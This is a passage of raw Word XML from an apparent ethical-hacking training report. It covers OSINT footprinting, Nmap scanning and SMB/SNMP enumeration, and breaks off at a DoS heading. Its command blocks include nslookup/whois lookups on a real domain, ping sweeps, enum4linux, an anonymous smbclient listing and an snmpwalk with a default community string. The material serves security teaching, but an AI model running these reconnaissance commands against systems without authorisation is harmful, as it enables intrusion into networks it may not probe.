      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Information Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4FC858" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Footprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the core initial lifecycle stage wherein public data regarding a target organization is collected systematically. The objective is to identify target infrastructure vectors, discover active DNS structures, parse social engineering domains, and document operational parameters without establishing direct intrusive contact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3264F42E" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4" w:rsidP="00B71DED">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="674726E9" w14:textId="7DB10201" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.1 Structured OSINT Methodology Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FACA79D" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">During the training, advanced </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Open Source</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> Intelligence (OSINT) workflows were evaluated across real-world staging domains (e.g., wiley.com and coursera.org) using specific tools mapped out in an explicit logical matrix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA70C41" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Target Resolution: Command Line </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> to trace absolute physical IP spaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8DC166" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>2. Name Server Discovery: Resolving authoritative infrastructure layers using explicit NS lookups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45415134" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">3. WHOIS Infrastructure Mapping: Accessing ICANN and ARIN databases to establish ownership blocks, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>NetRanges</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>, and administrative point-of-contacts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAE0F40" w14:textId="15D0E210" w:rsidR="00010BDF" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Web Stack Fingerprinting: Utilizing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Netcraft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> Site Reports and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>SecurityTrails</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> to extract hosting histories, operating system footprints, and underlying application dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4A319F" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B71DED" w14:paraId="2A6D04CF" w14:textId="77777777" w:rsidTr="002A21A7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1B365D"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="085E72F6" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="002A21A7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Querying physical IP structures and mapping administrative MX/NS blocks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>nslookup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> wiley.com</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>nslookup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> -type=ns wiley.com</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>whois</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 63.97.119.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B71DED" w14:paraId="4453FBED" w14:textId="77777777" w:rsidTr="002A21A7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="36" w:space="0" w:color="4A777A"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F6F9"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="335E50F1" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="002A21A7">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="4A777A"/>
              </w:rPr>
              <w:t xml:space="preserve">DEFENSIVE COUNTERMEASURE: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t>Organizations must minimize public data profiles through rigorous administrative countermeasures, such as clearing file metadata via automated pipelines, activating WHOIS registration privacy filters, and enforcing data minimizations on business systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1080B923" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4" w:rsidP="00266179"/>
    <w:p w14:paraId="1F9B6F6E" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4" w:rsidP="00266179"/>
    <w:p w14:paraId="738F1AEF" w14:textId="354B2A1D" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00266179">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>3. Network Scanning &amp; System Enumeration Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540941D4" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the foundational </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>footprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> sequence is executed, an ethical hacker shifts directly into structural scanning and service enumeration. This layer establishes real-time intelligence regarding open ports, alive hosts, active versions, and dynamic network directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A95F0D" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="022F375D" w14:textId="531C59AF" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.1 Core Scanning via Nmap Engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686B99FD" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>The training leveraged Nmap to answer three mandatory infrastructural pillars: What networks are actively joined, which hosts are currently alive, and what atomic service versions are running inside the network perimeter.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00010BDF" w14:paraId="1B7AC9B8" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1B365D"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="02FF6964" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Executing rapid ICMP ping sweep across target subnet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>nmap -sn 192.168.1.0/24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t># Aggregating service version detection, default scripting, and saving outputs to disk</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>nmap -sC -sV -oN scan.txt 192.168.1.15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="509947A6" w14:textId="3A6BC2C9" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.2 Deep Protocol Enumeration: NetBIOS, SMB, and SNMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235E97CE" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Scanning maps out open doors; enumeration looks deep inside the room to pull active usernames, host configurations, operating system kernels, and structural shared resources. The specific methodologies executed during lab exercises included:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF26DE8" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>NetBIOS Status Enumeration: Utilizing Nmap scripts to query UDP port 137, uncovering computer metadata, workgroups, and MAC identities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356F66B3" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Server Message Block (SMB) Parsing: Creating a lab with simulated shared folders (C:\Public, C:\Students, C:\Faculty) on Windows with LanmanServer enabled, then utilizing smbclient and enum4linux on Kali to systematically scrape active usernames and shared structures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC3BFF7" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Simple Network Management Protocol (SNMP) Infiltration: Querying UDP ports 161 and 162 via snmpwalk and snmp-check to dump full system descriptions, dynamic routing configurations, uptime, and exposed interfaces.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00010BDF" w14:paraId="31CE4BBF" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1B365D"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="29A81F87" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Interrogating NetBIOS data blocks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>nmap --script nbstat.nse 192.168.1.10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t># Compiling granular SMB directory matrices</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>enum4linux -a 192.168.1.10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>smbclient -L //192.168.1.10 -N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t># Querying specific SNMP Object Identifiers (OIDs) for system descriptors</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F091CD5" w14:textId="60ED47D7" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.3 Vulnerability Management Frameworks: Nessus and OpenVAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60069437" w14:textId="151A4BB3" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>To manage the identified open structures, vulnerability scanning frameworks were dissected. The labs established critical distinctions between 'Blind &amp; Noisy' automated hammering (which risks unexpected service disruptions or immediate firewall containment) and 'Smart Scanning' systems which match operational fingerprints against vulnerability libraries. Trainees categorized results into the universal quadrant metrics matrix: True Positives (legitimate flaws), False Positives (incorrect alerts), True Negatives (secure states), and False Negatives (untracked active flaws).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB4B165" w14:textId="77777777" w:rsidR="00266179" w:rsidRDefault="00266179" w:rsidP="00B71DED">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F628929" w14:textId="1C13D654" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>4. Denial of Service (DoS), DDoS, and Distributed Botnets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4234BFC3" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Denial of Service (DoS) and Distributed Denial of Service (DDoS) architectures focus on crippling system availability, exhausting physical compute blocks (CPU, system memory, connection queues), or saturating network bandwidth pipelines, thereby locking out authentic end-users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAD7BD2" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
